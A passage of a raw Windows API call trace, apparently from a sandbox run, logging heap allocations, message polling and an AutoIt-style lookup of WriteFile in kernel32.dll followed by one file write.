out: hHeap=0x8a0000) returned 1 [0161.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0161.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0161.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0161.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0161.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0161.694] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0161.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0161.695] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0161.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0161.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0161.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0161.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1af0 [0161.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0161.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0161.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0161.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0161.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18f0 [0161.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0161.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0161.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0161.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0161.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0161.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0161.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0161.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0161.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0161.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0161.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0161.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0161.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0161.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0161.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0161.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0161.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0161.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1d30 [0161.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0161.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0161.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0161.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a30 [0161.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0161.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdab0 [0161.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0161.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0161.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0161.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0161.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0161.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0161.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0161.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0161.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0161.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0161.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0161.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0161.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0161.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0161.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0161.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0161.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0161.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0161.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0161.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0161.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0161.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0161.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0161.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0161.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0161.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0161.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0161.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0161.696] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0161.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0161.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0161.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0161.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0161.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0161.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0161.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0161.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0161.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0161.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0161.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0161.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0161.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0161.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0161.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0161.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0161.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0161.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0161.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0161.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0161.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0161.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0161.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0161.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0161.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0161.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0161.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0161.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0161.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0161.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0161.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0161.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0161.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0161.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0161.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0161.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0161.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0161.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0161.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0161.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0161.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0161.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0161.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0161.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0161.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0161.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0161.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0161.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0161.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0161.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0161.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0161.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0161.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0161.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0161.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0161.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0161.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0161.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0161.698] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0161.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0161.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0161.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0161.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0161.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0161.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0161.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0161.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0161.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0161.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0161.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0161.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0161.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0161.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0161.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0161.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0161.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0161.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0161.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0161.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0161.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0161.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0161.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0161.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0161.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0161.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0161.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0161.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0161.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0161.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0161.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0161.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0161.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0161.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0161.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0161.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0161.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0161.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0161.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0161.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0161.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0161.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0161.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0161.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0161.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0161.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0161.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0161.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0161.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0161.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0161.700] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0161.700] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0161.700] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9bd780, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0161.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0161.700] GetProcAddress (hModule=0x75990000, lpProcName="WriteFile") returned 0x759a1282 [0161.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0161.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0161.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0161.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0161.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0161.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0161.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0161.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0161.701] WriteFile (in: hFile=0x138, lpBuffer=0xa85008*, nNumberOfBytesToWrite=0x10f89, lpNumberOfBytesWritten=0x87eae0, lpOverlapped=0x0 | out: lpBuffer=0xa85008*, lpNumberOfBytesWritten=0x87eae0*=0x10f89, lpOverlapped=0x0) returned 1 [0161.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0161.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0161.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0161.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0161.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0161.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0161.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0161.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0161.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0161.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0161.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0161.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0161.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0161.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0161.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0161.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0161.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0161.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0161.701] FreeLibrary (hLibModule=0x75990000) returned 1 [0161.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0161.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0161.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0161.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0161.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0161.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0161.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0161.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0161.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0161.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0161.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0161.702] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.702] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.702] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.702] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.702] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0161.702] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.702] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.702] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0161.704] FreeLibrary (hLibModule=0x75990000) returned 1 [0161.704] PeekMessageW (in: lpMsg=0x87f114, 